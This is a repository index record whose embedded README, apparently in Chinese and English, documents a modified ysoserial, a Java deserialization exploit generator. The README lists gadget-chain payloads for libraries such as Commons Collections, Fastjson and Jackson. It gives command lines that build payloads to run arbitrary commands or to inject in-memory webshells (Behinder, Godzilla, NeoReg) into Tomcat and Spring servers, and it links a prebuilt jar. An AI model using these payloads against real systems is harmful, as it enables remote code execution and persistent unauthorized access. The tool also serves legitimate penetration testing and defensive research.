{"id":13843071,"url":"https://github.com/Y4er/ysoserial","last_synced_at":"2025-07-11T17:33:18.646Z","repository":{"id":38201794,"uuid":"473716634","full_name":"Y4er/ysoserial","owner":"Y4er","description":"ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。","archived":false,"fork":false,"pushed_at":"2024-01-11T02:47:50.000Z","size":246,"stargazers_count":592,"open_issues_count":0,"forks_count":98,"subscribers_count":11,"default_branch":"main","last_synced_at":"2024-08-05T17:35:56.241Z","etag":null,"topics":["java"],"latest_commit_sha":null,"homepage":"https://github.com/Y4er/ysoserial/releases","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Y4er.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-03-24T17:55:50.000Z","updated_at":"2024-08-02T07:09:50.000Z","dependencies_parsed_at":"2023-12-13T01:53:08.073Z","dependency_job_id":"aa91e3d0-ea04-4df6-97bb-ded3cb3953be","html_url":"https://github.com/Y4er/ysoserial","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Y4er%2Fysoserial","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Y4er%2Fysoserial/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Y4er%2Fysoserial/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Y4er%2Fysoserial/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Y4er","download_url":"https://codeload.github.com/Y4er/ysoserial/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745418,"owners_count":17517639,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["java"],"created_at":"2024-08-04T17:01:54.471Z","updated_at":"2024-11-21T14:30:40.855Z","avatar_url":"https://github.com/Y4er.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"# ysoserial\n\nysoserial修改版,着重修改`ysoserial.payloads.util.Gadgets.createTemplatesImpl`使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。\n\n## Usage\n\n```shell\n$ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar\nY SO SERIAL?\nUsage: java -jar ysoserial-[version]-all.jar [payload] '[command]'\n Available payload types:\n一月 11, 2024 10:44:47 上午 org.reflections.Reflections scan\n信息: Reflections took 96 ms to scan 1 urls, producing 22 keys and 208 values\n Payload Authors Dependencies\n ------- ------- ------------\n AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2\n BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5\n C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11\n Ceylon @kai_ullrich ceylon.language:1.3.3\n Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0\n Clojure @JackOfMostTrades clojure:1.8.0\n CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2\n CommonsBeanutils183NOCC @Y4er commons-beanutils:1.8.3\n CommonsBeanutils192NOCC @Y4er commons-beanutils:1.9.2\n CommonsBeanutils192WithDualTreeBidiMap @Y4er commons-beanutils:1.9.2, commons-collections:3.1\n CommonsCollections1 @frohoff commons-collections:3.1\n CommonsCollections12 @Y4er commons-collections:3.1\n CommonsCollections2 @frohoff commons-collections4:4.0\n CommonsCollections3 @frohoff commons-collections:3.1\n CommonsCollections4 @frohoff commons-collections4:4.0\n CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1\n CommonsCollections6 @matthias_kaiser commons-collections:3.1\n CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1\n CommonsCollections8 @navalorenzo commons-collections4:4.0\n Fastjson1 @Y4er fastjson:1.2.83\n Fastjson2 @Y4er fastjson:2.x\n FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4\n Groovy1 @frohoff groovy:2.3.9\n Hibernate1 @mbechler\n Hibernate2 @mbechler\n JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21\n JRMPClient @mbechler\n JRMPListener @mbechler\n JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1\n Jackson1 @Y4er jackson-databind:2.14.2\n Jackson2 @Y4er jackson-databind:2.14.2, spring-aop:4.1.4.RELEASE\n JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21\n Jdk7u21 @frohoff\n Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2\n Jython2 @steven_seeley, @rocco_calvi jython-standalone:2.7.3\n MozillaRhino1 @matthias_kaiser js:1.7R2\n MozillaRhino2 @_tint0 js:1.7R2\n Myfaces1 @mbechler\n Myfaces2 @mbechler\n ROME @mbechler rome:1.0\n Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE\n Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2\n URLDNS @gebl\n Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14\n Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4\n```\n\n## 内存马相关\n\n以CommonsBeanutils192NOCC为例:\n\n```shell\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatCmdEcho\" # TomcatCmdEcho\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatServletMemShellFromJMX\" # TomcatServletMemShellFromJMX\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatServletMemShellFromThread\" # TomcatServletMemShellFromThread\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatFilterMemShellFromJMX\" # TomcatFilterMemShellFromJMX 适用于tomcat7-9\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatFilterMemShellFromThread\" # TomcatFilterMemShellFromThread 适用于tomcat7-9\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatListenerMemShellFromJMX\" # TomcatListenerMemShellFromJMX\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatListenerMemShellFromThread\" # TomcatListenerMemShellFromThread\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:TomcatListenerNeoRegFromThread\" # TomcatListenerNeoRegFromThread python neoreg.py -k fuckyou\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"CLASS:SpringInterceptorMemShell\" # SpringInterceptorMemShell 链接shell需要使用存在的路由\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"FILE:E:\\Calc.class\" # ClassLoaderTemplate\njava -jar ysoserial.jar CommonsBeanutils192NOCC \"calc\" # CommandTemplate CLASS: FILE: 不使用协议开头则默认为执行cmd\n```\n\n一键注入cmdshell、冰蝎、哥斯拉内存马,shell连接使用请查看指定类。解决了request和response包装类导致冰蝎链接失败的问题,[见issue](https://github.com/rebeyond/Behinder/issues/187)。\n\n以下受到`Gadgets.createTemplatesImpl`影响的gadget均需要如上方式传递参数:\n\n1. Click1\n2. CommonsBeanutils1\n3. CommonsBeanutils183NOCC\n4. CommonsBeanutils192NOCC\n5. CommonsCollections2\n6. CommonsCollections3\n7. CommonsCollections4\n8. Hibernate1\n9. JavassistWeld1\n10. JBossInterceptors1\n11. Jdk7u21\n12. JSON1\n13. MozillaRhino1\n14. MozillaRhino2\n15. ROME\n16. Spring1\n17. Spring2\n18. Vaadin1\n\n## 下载\n\n1. [点我下载打包好的jar包](https://github.com/Y4er/ysoserial/releases/download/latest/ysoserial-0.0.6-SNAPSHOT-all.jar)\n\n\n## Building\n\nRequires Java 1.7+ and Maven 3.x+\n\n```mvn clean package -DskipTests```\n\n## Contributing\n\n1. Fork it\n2. Create your feature branch (`git checkout -b my-new-feature`)\n3. Commit your changes (`git commit -am 'Add some feature'`)\n4. Push to the branch (`git push origin my-new-feature`)\n5. Create new Pull Request\n\n## See Also\n\n* [frohoff/ysoserial](https://github.com/frohoff/ysoserial)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FY4er%2Fysoserial","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FY4er%2Fysoserial","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FY4er%2Fysoserial/lists"}